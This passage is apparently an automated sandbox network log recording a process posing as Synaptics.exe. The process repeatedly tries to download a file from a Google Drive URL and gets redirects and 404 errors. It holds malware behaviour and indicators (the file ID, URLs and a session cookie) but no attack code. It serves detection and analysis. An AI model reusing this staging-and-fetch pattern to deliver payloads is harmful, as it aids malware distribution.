                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49904 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:12 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
2024-12-25 08:08:13 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:13 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-cPImEMJREEx7o9TcLshPww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49906 | 142.250.181.97 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:12 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
2024-12-25 08:08:13 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC6-UI5mK88lRPswtx-fAsCMQDiZRMSZYgSXkbXmSt71T4zF7kGkEfawWMf2ltJgCP5A
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:13 GMT
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Jou4T4o0EML-4h0QGELL6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
2024-12-25 08:08:13 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-25 08:08:13 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="ziZN_BxG86KoZ0xWDW7ztA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-25 08:08:13 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49905 | 142.250.181.97 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:12 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
2024-12-25 08:08:13 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC4ATCLUljMnGFjPbXP4pv-C9g3erijnJgFueJ6Y4jdIzA1xrgpTZX60x8FZQcGfabXN
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:13 GMT
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-59cUY-mts2pNKvXhSvNqeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
2024-12-25 08:08:13 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-25 08:08:13 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="hs_TUuFy9KbClfuVnpitHw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-25 08:08:13 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49907 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:12 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
2024-12-25 08:08:13 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:13 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-KLwtie8W8YAfxJl4A1lwWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49926 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:15 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
2024-12-25 08:08:16 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:16 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-bda4h8WpZ58vshmWnfDM8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49925 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:15 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
2024-12-25 08:08:16 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:16 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-CBcSKUZHk-wgUulIiyYC8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
41 | 192.168.2.4 | 49944 | 142.250.181.14 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:19 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
2024-12-25 08:08:20 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:20 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-MSBVic9PSQG9yImMcYXZnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 49945 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:19 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
2024-12-25 08:08:20 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:20 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-kxh4knhtBW8pbz_kK_reQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49954 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:22 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
2024-12-25 08:08:23 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:23 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ThLGAaDaYyEPc01R8L4VAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                44 | 192.168.2.4 | 49955 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:08:22 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:23 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:23 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-0GnnUmKFuAzeQgDha21wiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                45 | 192.168.2.4 | 49953 | 142.250.181.97 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:08:22 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:23 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC46zEPSxOXnJtWRuxBmoPvCgz0JpN_GrTo3Gi877QCbuy14KGjfx15jolvfv1M3Ecmu1BCtmzY
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:23 GMT
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-qQeMKvbM7tZEbPylnYa-ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:08:23 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
